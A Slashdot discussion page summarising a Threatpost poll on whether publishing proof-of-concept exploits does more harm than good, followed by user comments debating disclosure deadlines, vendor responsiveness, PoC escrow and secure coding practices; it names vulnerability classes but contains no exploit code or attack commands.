Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security Bug

Do Proof-of-Concept Exploits Do More Harm Than Good? (threatpost.com) 37

secwatcher writes: When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.

In fact, almost 60 percent of 230 security pundits thought it was a "good idea" to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn't a good idea.

Dr. Richard Gold, head of security engineering at Digital Shadows, told Threatpost that PoC code makes it easier for security teams to do penetration testing: "Rather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable," Gold told Threatpost. "This ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation." In fact, up to 85 percent of respondents said that the release of PoC code acts as an "effective motivator" to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been "instrumental" in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won't fix a bug in a timely manner...

On the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched... Matt Thaxton, senior consultant at Crypsis Group, thinks that the "ultimate function of a PoC is to lower the bar for others to begin making use of the exploit... In many cases, PoC's are put out largely for the notoriety/fame of the publisher and for the developer to 'flex' their abilities...."

This issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: "I believe the release of PoC code functions more like an implied threat to anyone that doesn't patch: 'You'd better patch . . . or else,'" he said "This kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability."

And Joseph Carson, chief security scientist at Thycotic, tells them "Let's be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them."
This discussion has been archived. No new comments can be posted.

Do Proof-of-Concept Exploits Do More Harm Than Good?

Comments Filter:
  • by AleRunner ( 4556245 ) on Sunday January 26, 2020 @06:35PM (#59658540)

    We keep coming back to this. If the security researchers don't release PoC, the vendors say "this is a theoretical vulnerability". If the researchers don't set a deadline then software vendors put off fixes forever. If security researchers default to giving contact information then they get sued.

    "Responsible disclosure" has its place with clearly trustworthy vendors - like the ones that offer and actually pay bug bounties and guarantee that results can be published. For the rest, the default has to be anonymous release of PoCs and security report with at most minimal warning to vendors. It's going to be pretty rare that a security researcher actually is the first to discover a vulnerability since hackers have more motivation and money in the game. The damage this causes is less than you'd think, but the pressure it puts on vendors to behave reasonably is invaluable.

    • by Kjella ( 173770 )

      It's unreasonable to expect vendors to fix it instantly and it's unreasonable to expect all clients to patch instantly. In my opinion you should therefore give it to them in private and have two deadlines, on the first on you publicly disclose the vulnerability so the vendor should have a patch ready before that. On the second you publicly disclose the PoC making exploits easy, so the customers should have patched before that. Yeah some crooks probably have it already but you don't need to give everyone a p

      • Many PoC are withheld, eg Bluekeep and a lot of the CPU issues. There are two issues with that, first of all, it makes it really hard to know whether you have successfully patched a system if the issue is obscure and you have no tests. The second is that most of the time any programmer can build a PoC by inspecting the patches and what it has changed. So you get into a situation where the customers can't test but the hackers can.

        • +1. guruevi is right and Kjella is wrong. PoCs help vendors and customers far more than they help attackers.

    • If corporations don't want to be pwn3d, they shouldn't have written the exploitable code to begin with.
      • If corporations don't want to be pwn3d, they shouldn't have written the exploitable code to begin with.

        Ah, the "just don't make mistakes" strategy. Yeah, that tends to fail spectacularly. Much better to assume that the code will contain vulnerabilities, and design defense in depth plus a good patching strategy and a generous bug bounty.

        • Most companies don't have any strategy for avoiding security mistakes. If you interview their developers, a lot of them won't even know what an XSS exploit is, let alone common strategies for avoiding them. These companies are negligent.
          • Most companies don't have any strategy for avoiding security mistakes. If you interview their developers, a lot of them won't even know what an XSS exploit is, let alone common strategies for avoiding them. These companies are negligent.

            Sure, developers should be trained and take care. But that will only reduce vulnerabilities, not eliminate them.

            • A good chunk of them can be eliminated. Your team doesn't still have SQL injections, do they?
              • A good chunk of them can be eliminated.

                "A good chunk of them can be eliminated", means "that will only reduce vulnerabilities, not eliminate them."

                Your team doesn't still have SQL injections, do they?

                My team doesn't have SQL injections. My team doesn't use SQL. We work at the system, kernel and firmware layers. And we do a lot of work to prevent buffer overflows, integer overflows, TOCTOU errors and other race conditions. We also put a lot of effort into preventing side channel attacks, and to minimize the effectiveness of hardware attacks. We primarily use a safe, pointer-free subset of C++, u

                • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.
                  • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.

                    Not in my life... especially with side channels, we get a clever new vulnerability class every other year or so. :-)

                  • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.

                    Also, it's not really possible to eliminate all instances of known vulnerability classes either. I said "Even if you were perfect and could prevent...", figuring it was clear that I was implying that because you're human you can't. But just in case that wasn't clear: You're human. You can't.

    • Exaxtly. The code IS ALREADY insecure! It WILL already be exploited. You must always assume that people DO have an exploit, whether it was published or not. This is only enabling slacking off, and endangering people with head-in-the-sand pseudo-security ignorance.

    • We keep coming back to this. If the security researchers don't release PoC, the vendors say "this is a theoretical vulnerability".

      That's not the only issue, and there are vendors who take security seriously for whom this definitely isn't a problem. But even for them, a PoC helps them to be able to verify that they've fixed the issue. Even better, it's often not too difficult to turn a PoC into a test that can be added to the standard test suite for the product, to ensure that the vulnerability doesn't accidentally get reintroduced. I work on Android and for Android there's another reason such PoC-based tests are valuable: Google can

  • by Anonymous Coward
    One of the positives is that you can apply it against your systems to test. The downside is that a bad actor adapts it. However the risk from someone that needs to adapt the code is low, compared to a bad actor that's competent enough to write his own from the details of the vunerability. In which case, there's no downside.
  • by Todd Knarr ( 15451 ) on Sunday January 26, 2020 @07:17PM (#59658630) Homepage

    How often have we heard a vendor dismiss a reported vulnerability with "It's strictly theoretical, there's no evidence it can actually be exploited in practice.". This is especially true of vulnerabilities like the Meltdown and Spectre families where fixes or mitigations are either extremely difficult or impose high performance or other penalties. PoC code removes the ability for the vendor to deny/dismiss the vulnerability as not possible in practice, and the fact that PoC code needs to be released before vendors will act points to the problem being vendor attitudes, not the publication of PoC code.

    • So, as an extension to the responsible disclosure system, how about a PoC escrow? Have a responsible third party such as Mitre or Google Project Zero hold the PoC code privately with researcher attribution until the mitigating patch has been available for a couple weeks or a public exploit becomes known. Allow for early sharing with major security firms to develop antimalware and IDS signatures. The current practice of having the PoC code released along with the patch on the same day puts defenders on the b
      • by Todd Knarr ( 15451 ) on Sunday January 26, 2020 @11:49PM (#59659286) Homepage

        We tried it that way already (and not even with mere escrow, researchers actively sent the PoC code along with the details to the vendors). The answer we got was the vendors ignoring the submission until it was reported publicly, then dismissing it and/or actually suing the researchers in an attempt to get them to shut up about vulnerabilities. The vendors created this situation, I'll believe we can trust them after I've seen them change their ways and stop trying to dismiss or minimize the severity of reported vulnerabilities.

        "Fool me once, shame on you. Fool me twice, shame on me."

      • So, as an extension to the responsible disclosure system, how about a PoC escrow? Have a responsible third party such as Mitre or Google Project Zero hold the PoC code privately with researcher attribution until the mitigating patch has been available for a couple weeks or a public exploit becomes known.

        What would be the point of escrowing the PoC? Just send it to the vendor along with the vuln description. Then give them a reasonable amount of time to deploy the bug before vuln description and PoC are published together. This is what Google Project Zero does. It seems the be the best of a set of less-than-ideal options.

  • PoC||GTFO (Score:5, Insightful)

    by phantomfive ( 622387 ) on Sunday January 26, 2020 @08:21PM (#59658762) Journal
    If a "security firm" doesn't release a proof of concept, then there's a good chance the hack isn't real. I've spent a reasonable amount of time chasing down and reproducing security exploits, and they are almost always hyped up more than justified, and a good portion of the time they are not reproducible at all.
    • On the other hand many companies and projects won't even take a bug seriously if you don't write a PoC.

      Several years ago I found a bug in Samba that could cause a DoS (connections that were opened without traffic could spawn a hanging process for a really long time).

      I wrote some really quick and dirty report and told them how to see it but I didn't have time to build a complete PoC that crashed a server. They left the bug report open agreeing with my result. It took another 2 years for someone else to find

  • You should *know* that keeping an exploit secret will mean nothing more than only the bad guys having the exploit now.

    Your fallacy lies in the delusion that somebody running unsafe code would still be secure when the hole is still obscure.
    When in reality, the whole point of publishing the exploit is to make everybody realize the harsh reality: They are NOT secure anymore, they could be cracked at any time, maybe already are, and should stop that code right freakin' NOW!!

    Your auggestion enables them to keep

  • Honestly, they in the end do to the community. But to the individual, who does not intend to use, who is spreading this information also has to prove and validate that it works. #POCOGTFO I would be best if the vendor is given the chance to patch. If there is no patch, the internet needs to know. The PoC articles should go far as they can without making it just straight "script kiddy" with no knowledge
  • Where a language barrier or choice of vernacular can confuse an issue the PoC code always makes it clear. This helps people not only pen test the relevant system but developers understand the nature of the problem allowing them head off creating a similar problem in new code.

  • But ofcourse they do more harm than good. Or no, they do more good than harm. It depends, as stated above, on the point of view. If you are fired because you happened to be in the position to manage -an exploited feature- of -something-, than you may not share the view of -whatever- being good. it still may be good. Timing is of the essence, as always, as the moment you publish something may be vital for it to be good or bad. Someone making a proof of concept exploit on something should at least try to i

It is easier to write an incorrect program than understand a correct one.

Working...